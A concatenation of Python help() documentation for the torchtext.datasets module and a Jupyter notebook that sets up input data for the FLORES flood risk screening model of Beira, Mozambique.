| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class WikiText103(LanguageModelingDataset)
| WikiText103(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| Defines a dataset for language modeling.
|
| Method resolution order:
| WikiText103
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(batch_size=32, bptt_len=35, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the WikiText-103 dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| bptt_len: Length of sequences for backpropagation through time.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| wv_dir, wv_type, wv_dim: Passed to the Vocab constructor for the
| text field. The word vectors are accessible as
| train.dataset.fields['text'].vocab.vectors.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, root='.data', train='wiki.train.tokens', validation='wiki.valid.tokens', test='wiki.test.tokens', **kwargs) from builtins.type
| Create dataset objects for splits of the WikiText-103 dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for text data.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-103
| subdirectory the data files will be stored.
| train: The filename of the train data. Default: 'wiki.train.tokens'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'wiki.valid.tokens'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'wiki.test.tokens'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'wikitext-103'
|
| name = 'wikitext-103'
|
| urls = ['https://s3.amazonaws.com/research.metamind.io/wikitext/wikite...
|
| ----------------------------------------------------------------------
| Methods inherited from LanguageModelingDataset:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class WikiText2(LanguageModelingDataset)
| WikiText2(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| Defines a dataset for language modeling.
|
| Method resolution order:
| WikiText2
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(batch_size=32, bptt_len=35, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the WikiText-2 dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| bptt_len: Length of sequences for backpropagation through time.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| wv_dir, wv_type, wv_dim: Passed to the Vocab constructor for the
| text field. The word vectors are accessible as
| train.dataset.fields['text'].vocab.vectors.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, root='.data', train='wiki.train.tokens', validation='wiki.valid.tokens', test='wiki.test.tokens', **kwargs) from builtins.type
| Create dataset objects for splits of the WikiText-2 dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for text data.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| train: The filename of the train data. Default: 'wiki.train.tokens'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'wiki.valid.tokens'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'wiki.test.tokens'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'wikitext-2'
|
| name = 'wikitext-2'
|
| urls = ['https://s3.amazonaws.com/research.metamind.io/wikitext/wikite...
|
| ----------------------------------------------------------------------
| Methods inherited from LanguageModelingDataset:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class XNLI(NLIDataset)
| XNLI(path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
|
| Defines a Dataset of columns stored in CSV, TSV, or JSON format.
|
| Method resolution order:
| XNLI
| NLIDataset
| torchtext.data.dataset.TabularDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(*args, **kwargs) from builtins.type
| Create iterator objects for splits of the SNLI dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| trees: Whether to include shift-reduce parser transitions.
| Default: False.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, genre_field=None, language_field=None, root='.data', validation='xnli.dev.jsonl', test='xnli.test.jsonl') from builtins.type
| Create dataset objects for splits of the SNLI dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for premise and hypothesis
| data.
| label_field: The field that will be used for label data.
| parse_field: The field that will be used for shift-reduce parser
| transitions, or None to not include them.
| extra_fields: A dict[json_key: Tuple(field_name, Field)]
| root: The root directory that the dataset's zip archive will be
| expanded into.
| train: The filename of the train data. Default: 'train.jsonl'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'dev.jsonl'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'test.jsonl'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'XNLI-1.0'
|
| name = 'xnli'
|
| urls = ['http://www.nyu.edu/projects/bowman/xnli/XNLI-1.0.zip']
|
| ----------------------------------------------------------------------
| Static methods inherited from NLIDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.TabularDataset:
|
| __init__(self, path, format, fields, skip_header=False, csv_reader_params={}, **kwargs)
| Create a TabularDataset given a path, file format, and field list.
|
| Arguments:
| path (str): Path to the data file.
| format (str): The format of the data file. One of "CSV", "TSV", or
| "JSON" (case-insensitive).
| fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:
| If using a list, the format must be CSV or TSV, and the values of the list
| should be tuples of (name, field).
| The fields should be in the same order as the columns in the CSV or TSV
| file, while tuples of (name, None) represent columns that will be ignored.
|
| If using a dict, the keys should be a subset of the JSON keys or CSV/TSV
| columns, and the values should be tuples of (name, field).
| Keys not present in the input dictionary are ignored.
| This allows the user to rename columns from their JSON/CSV/TSV key names
| and also enables selecting a subset of columns to load.
| skip_header (bool): Whether to skip the first line of the input file.
| csv_reader_params(dict): Parameters to pass to the csv reader.
| Only relevant when format is csv or tsv.
| See
| https://docs.python.org/3/library/csv.html#csv.reader
| for more details.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
FUNCTIONS
AG_NEWS(*args, **kwargs)
Defines AG_NEWS datasets.
The labels includes:
- 1 : World
- 2 : Sports
- 3 : Business
- 4 : Sci/Tech
Create supervised learning dataset: AG_NEWS
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.AG_NEWS(ngrams=3)
AmazonReviewFull(*args, **kwargs)
Defines AmazonReviewFull datasets.
The labels includes:
1 - 5 : rating classes (5 is highly recommended)
Create supervised learning dataset: AmazonReviewFull
Separately returns the training and test dataset
Arguments:
root: Directory where the dataset are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.AmazonReviewFull(ngrams=3)
AmazonReviewPolarity(*args, **kwargs)
Defines AmazonReviewPolarity datasets.
The labels includes:
- 1 : Negative polarity
- 2 : Positive polarity
Create supervised learning dataset: AmazonReviewPolarity
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.AmazonReviewPolarity(ngrams=3)
DBpedia(*args, **kwargs)
Defines DBpedia datasets.
The labels includes:
- 1 : Company
- 2 : EducationalInstitution
- 3 : Artist
- 4 : Athlete
- 5 : OfficeHolder
- 6 : MeanOfTransportation
- 7 : Building
- 8 : NaturalPlace
- 9 : Village
- 10 : Animal
- 11 : Plant
- 12 : Album
- 13 : Film
- 14 : WrittenWork
Create supervised learning dataset: DBpedia
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.DBpedia(ngrams=3)
SogouNews(*args, **kwargs)
Defines SogouNews datasets.
The labels includes:
- 1 : Sports
- 2 : Finance
- 3 : Entertainment
- 4 : Automobile
- 5 : Technology
Create supervised learning dataset: SogouNews
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.SogouNews(ngrams=3)
YahooAnswers(*args, **kwargs)
Defines YahooAnswers datasets.
The labels includes:
- 1 : Society & Culture
- 2 : Science & Mathematics
- 3 : Health
- 4 : Education & Reference
- 5 : Computers & Internet
- 6 : Sports
- 7 : Business & Finance
- 8 : Entertainment & Music
- 9 : Family & Relationships
- 10 : Politics & Government
Create supervised learning dataset: YahooAnswers
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.YahooAnswers(ngrams=3)
YelpReviewFull(*args, **kwargs)
Defines YelpReviewFull datasets.
The labels includes:
1 - 5 : rating classes (5 is highly recommended).
Create supervised learning dataset: YelpReviewFull
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.YelpReviewFull(ngrams=3)
YelpReviewPolarity(*args, **kwargs)
Defines YelpReviewPolarity datasets.
The labels includes:
- 1 : Negative polarity.
- 2 : Positive polarity.
Create supervised learning dataset: YelpReviewPolarity
Separately returns the training and test dataset
Arguments:
root: Directory where the datasets are saved. Default: ".data"
ngrams: a contiguous sequence of n items from s string text.
Default: 1
vocab: Vocabulary used for dataset. If None, it will generate a new
vocabulary based on the train data set.
include_unk: include unknown token in the data (Default: False)
Examples:
>>> train_dataset, test_dataset = torchtext.datasets.YelpReviewPolarity(ngrams=3)
DATA
__all__ = ['LanguageModelingDataset', 'SNLI', 'MultiNLI', 'XNLI', 'SST...
FILE
c:\programdata\anaconda3\lib\site-packages\torchtext\datasets\__init__.py
|
src/FLORES_dashboard/.ipynb_checkpoints/FLORES Screening - Beira-checkpoint.ipynb | ###Markdown
Flood Risk Reduction Evaluation and ScreeningFLORES is a fast flood risk screening model, aimed at providing useful information early in the decision-making process for flood-prone cities. It simulates and evaluates the impact of many alternative flood risk reduction strategies, each consisting of a combination of measures.Basic formulas are used instead of more complex hydraulic modelling software, to reduce computation time, and to allow the model to run on a personal computer. Multiple flood hazards; Considers multiple flood hazards: coastal flooding, river flooding, and urban flooding. Also storms can be simulated that compound the effects of multiple hazards,Combining structural and non-structural measures; The FLORES model takes various methods of reducing flood risk into account. Including: coastal protection, storm surge barriers, drainage, retention, urban planning, early warning systems,Multiple performance metrics for comparison; As most decisions are not made solely based on economic arguments, flood risk reduction strategies are assessed based on multiple parameters,Multi-purpose evaluation techniques; Early in design, many stakeholders are involved. A wide range of different analysis tools is available, in order to tailor the type of analysis to the specific needs of the user. This can range from finding correlations and trade-offs, to scenario discovery or more sophisticated robust decision making tools. These tools are provided through the use of the EMA-workbench (Kwakkel, 2017),Limited data requirements; Many flood-prone cities are located in regions that lack reliable data. The model focusses on the conceptual design phase, where detailed results are not expected yet. Therefore, it is built to work with widely-available (open) data sets.Generic setup; The FLORES model aims to be used in a wide variety of situations and areas. It is therefore developed as a generic model, consisting of separate modules, where no additional coding is required. The model only requires processing of the local characteristics, partly by using GIS-tools. The FLORES model has been developed at Delft University of Technology, Department of Hydraulic Engineering, in cooperation with GFDRR and the World Bank Group (van Berchum, 2019). Parts of the model have been developed in previous research, in cooperation with Texas A&M University Galveston (van Berchum and Mobley, 2017) This notebook runs through the entire model, including installation, input data, simulation, and several analyses. It requires no previous installation, besides Python 3 and Jupyter Notebook. Throughout the walkthrough, multiple packages will be downloaded, most notably the EMA-workbench.Version FLORES model: 0.3 (first generic version) Version EMA-workbench: 2.1Last Updated: 29-11-2019 1. Download and installation modelHere, we download the main model components:FLORES, available on Github EMA-workbench, available on pip build correct folder structure for analysis: data, figs, Library,(input data folder, FLORES python files) analysis notebook, runner notebook
###Code
#from __future__ import (absolute_import, division, print_function, unicode_literals)
from pathlib import Path
import os
import sys
# never use absolute paths that are system specific unless you
# realy have no other choice
sys.path.append(os.path.abspath('..'))
from ema_workbench import (CategoricalParameter, RealParameter, ScalarOutcome, Constant,
ReplicatorModel, ema_logging, MultiprocessingEvaluator,
save_results)
from FLORES_tools.Library.flood_simulation_model import (FloodSimModel, process_risk, pick_one, process_affected_people, SimulationInput)
from datetime import date
from timeit import default_timer as timer
path_src = os.path.abspath('..')
print(path_src)
###Output
D:\GitHub\FLORES-Beira\src
###Markdown
2. Import model parts for analysis- import all ema-workbench files needed for analysis- import all other packages needed for analysis 3. Import case study data- make a choice in which DEM to use- show DEM, basin strucure, layers structure- import .csv files of basins, layers- show+import measures data- show+import all storm data- show+import damage curves- show+import drainage data
###Code
dir_name_data = os.path.join(path_src, 'Projects/FLORES_beira/input_data').replace('\\','/')
print(dir_name_data)
flores_sim = FloodSimModel()
# Make choice for DEM
flores_dem = 'TanDEM'
suffix_dem = '.PNG'
dem_folderpath = os.path.join(dir_name_data, 'schematization/', flores_dem).replace('\\','/')
dem_plotfile = str(os.path.join(dem_folderpath, flores_dem + suffix_dem)).replace('\\','/')
dem_datafolder = os.path.join(dem_folderpath, 'data').replace('\\','/')
###Output
_____no_output_____
###Markdown
City schematizationGIS-based computations are often computationally very demanding. Therefore, the area will be schematized to speed up the simulation. Within the FLORES model, the city will be schematized as a number of drainage basins. A drainage basin is defined as the area where water drains towards the same location, i.e. the lowest point in that specific area. This way, the local topography of the city, with local depressions, is accounted for. The hydraulic simulation of a storm and/or rainfall event revolves around the (connected) volume balances of these drainage basins. This type of simulation has many similarities with other Rapid Flood Inundation Models (RFIM) as proposed by Shen et al. (2016), Liu and Pender (2010) and Lhomme et al. (2008). In the FLORES Flood simulation, this volume balance is expanded by taking into account rainfall, infiltration, drainage, retention and surface flow between drainage basins.Moreover, when a city is also threatened by storm surge, lines of defense (e.g. coastline, riverbank) are also defined and the water flowing across such a line of defense is modelled as inflow for the affected drainage basins. This volume balance will be repeated for each basin and for every timestep throughout the flood event.
###Code
# Show schematization
suffix_plot = '.PNG'
suffix_data = '.csv'
basin_plotfile = str(os.path.join(dem_folderpath, flores_dem + '_basins' + suffix_plot)).replace('\\','/')
LOD_plotfile = str(os.path.join(dem_folderpath, flores_dem + '_lines_of_defense' + suffix_plot)).replace('\\','/')
basin_datafile = str(os.path.join(dem_datafolder, flores_dem + '_basins' + suffix_data)).replace('\\','/')
LOD_datafile = str(os.path.join(dem_datafolder, flores_dem + '_lines_of_defense' + suffix_data)).replace('\\','/')
basin_borders_datafile = str(os.path.join(dem_datafolder, flores_dem + '_basin_borders' + suffix_data)).replace('\\','/')
basin_drainage_datafile = str(os.path.join(dem_datafolder, flores_dem + '_basin_drainage' + suffix_data)).replace('\\','/')
flores_sim.save_source('basins', basin_datafile)
flores_sim.save_source('layers', LOD_datafile)
flores_sim.save_source('basin_borders', basin_borders_datafile)
flores_sim.save_source('basin_drainage', basin_drainage_datafile, 'yes')
###Output
_____no_output_____
###Markdown
ExposureThe impact calculation is based on people and structures exposed to inundation caused by the storm. There is spatial data available on population and structural value. By combining this data with the DEM, csv-datafiles are built containing population numbers and structural value for individual drainage basins, and for different elevation levels within.
###Code
pop_source = 'ADFR_pop'
str_source = 'ADFR_str'
folder_exposure = 'exposure'
suffix_plot = '.tif'
suffix_data = '.csv'
exposure_folderpath = os.path.join(dem_datafolder, folder_exposure).replace('\\','/')
pop_folder = os.path.join(exposure_folderpath,pop_source).replace('\\','/')
str_folder = os.path.join(exposure_folderpath, str_source).replace('\\','/')
pop_plotfile = str(os.path.join(pop_folder, pop_source + suffix_plot)).replace('\\','/')
structures_plotfile = str(os.path.join(str_folder, str_source + '.png')).replace('\\','/')
pop_datafile = str(os.path.join(pop_folder, pop_source + suffix_data)).replace('\\','/')
str_datafile = str(os.path.join(str_folder, str_source + suffix_data)).replace('\\','/')
flores_sim.save_source('population', pop_datafile)
flores_sim.save_source('structures', str_datafile, 'yes')
###Output
_____no_output_____
###Markdown
The damage to exposed structures is measured with the use of damage curves. These curves give the amount of damage as a result of a given inundation depth. damage curves are available for different land use types. Please note that these figures are used to calculate the expected value of structural damage. The amount of people affected uses a simplified definition, where a person is 'affected' when the water level in the residence rises above 10 cm.
###Code
dam_curve_source = "damage_curves_JRC"
suffix_dam_curve = ".xlsx"
dam_curve_file = str(os.path.join(dir_name_data, 'schematization/' + dam_curve_source + suffix_dam_curve)).replace('\\','/')
flores_sim.save_source('damage_curves', dam_curve_file, 'yes')
print(dam_curve_file)
###Output
D:/GitHub/FLORES-Beira/src/Projects/FLORES_beira/input_data/schematization/damage_curves_JRC.xlsx
###Markdown
Flood risk reduction measures A flood risk reduction strategy consists of a combination of potential measures. In order to represent the full array of options for flood risk management, many different types of measures are included. Measures can affect different parts of the model. table, th, td { border: 1px solid black; border-collapse: collapse;}th, td { padding: 5px; text-align: left; } Type Measure Location Costs Remarks Coastal structures Coastal dike - East Eastern coast 2 million USD Possible heights: 7.0;7.5;8.0;8.5;9.0;9.5 m Coastal dike - West Western coast 4 million USD Coastal dunes - East Eastern coast 4 million USD Floodwall - West Western coast 4 million USD Coastal dike - West Western coast 4 million USD Coastal dike - West Western coast 4 million USD First, we will run a single simulation to look at its effects. Therefore, it is necessary to choose a strategy, consisting of a combination of flood risk reduction measures. Below, all locations where measures can be placed are listed. The options are listed at the appropriate location and correspond to the measures in the table above.
###Code
measures_source = 'flood_risk_reduction_measures_'
suffix_measures_data = '.csv'
measures_datafile = str(os.path.join(dir_name_data,'measures/' + measures_source + flores_dem + suffix_measures_data)).replace('\\','/')
flores_sim.save_source('measures', measures_datafile, 'yes')
flores_sim.define_active_measures(CD_1=True,
CD_2=True,
CD_3=True,
CD_4=True,
SM_1=True,
DR_1=True,
DR_2=True,
RT_1=True,
RT_2=True,
EM_1=True,
EM_2=True
)
###Output
_____no_output_____
###Markdown
Import storm dataThe simulation is centered around the effects of an incoming storm. In the current FLORES model, it is possible to take into account the effects of coastal storm surge and extreme rainfall. These hazards can occur separately or together, as would be the case during a cyclone event. The severity of the storm is measured in the return period of the underlying hazard. For example, a cyclone can lead to 100-year storm surge and a 10-year rainfall event. Coastal storm surge is simulated in the form of a time series of water levels along the coast. All transitioning from deep sea to nearshore conditions is done beforehand. The length of the storm can vary. As time series of storms are often scarse, time series of historic events are scaled, depending on the highest reached water levels.Rainfall is much more random to simulate, as each rainfall event can show a totally different time series of rainfall intensity. It is therefore unnecessary and unrealistic to base time series on past events, which is why a constant time series will be used. When no information is available about local hotspots that receive significantly higher amounts of rainfall, the spatial distribution is also constant. By choosing a source and plotting the result, you can see the rainfall duration-intensity curves and the 100 year storm surge time series.
###Code
rain_source = 'study_chiveve'
ss_source = 'SS'
folder_hazard = 'hazards'
suffix_plot = '.jpg'
suffix_data = '.csv'
hazard_folderpath = os.path.join(dir_name_data, folder_hazard).replace('\\','/')
rain_plotfile = str(os.path.join(hazard_folderpath,'rainfall_' + rain_source + suffix_plot)).replace('\\','/')
ss_plotfile = str(os.path.join(hazard_folderpath, 'surge_' + ss_source + suffix_plot)).replace('\\','/')
rain_datafile = str(os.path.join(hazard_folderpath, 'rainfall_' + rain_source + suffix_data)).replace('\\','/')
ss_datafile = str(os.path.join(hazard_folderpath, 'surge_' + ss_source + suffix_data)).replace('\\','/')
flores_sim.save_source('hazard_rain', rain_datafile)
flores_sim.save_source('hazard_surge', ss_datafile, 'yes')
###Output
_____no_output_____
###Markdown
Future scenariosThe change of a city over time can greatly affect the impact of implementing flood risk reduction measures. Likewise, changes to hazard intensity - due to climate change - can greatly change the situation. It is therefore crucial to look at flood risk reduction in the context of changing circumstances and a changing city. Looking at all possible futures, in order to find the strategy that fits all possible futures, is at the heart of Robust Decision Making. With the use of the screening tool and analysis tools provided by the EMA-workbench, it is possible to pursue robust solutions.In this case study, only the effects of climate change can be altered, in order to see its effect on the risk profile. Urban development is also added to the model. However, because it is connected to land use types, which don't very much throughout the city, varying the urban development predictions provides no new information.
###Code
climate_source = 'IPCC'
urban_source = 'GOV'
folder_scenarios = 'scenarios'
suffix_scenarios_data = '.csv'
scenarios_folderpath = os.path.join(dir_name_data, folder_scenarios).replace('\\','/')
climate_scenarios_data = str(os.path.join(scenarios_folderpath,'climate_' + climate_source + suffix_scenarios_data)).replace('\\','/')
urban_scenarios_data = str(os.path.join(scenarios_folderpath, 'urban_dev_' + urban_source + suffix_scenarios_data)).replace('\\','/')
flores_sim.save_source('climate_scenarios', climate_scenarios_data)
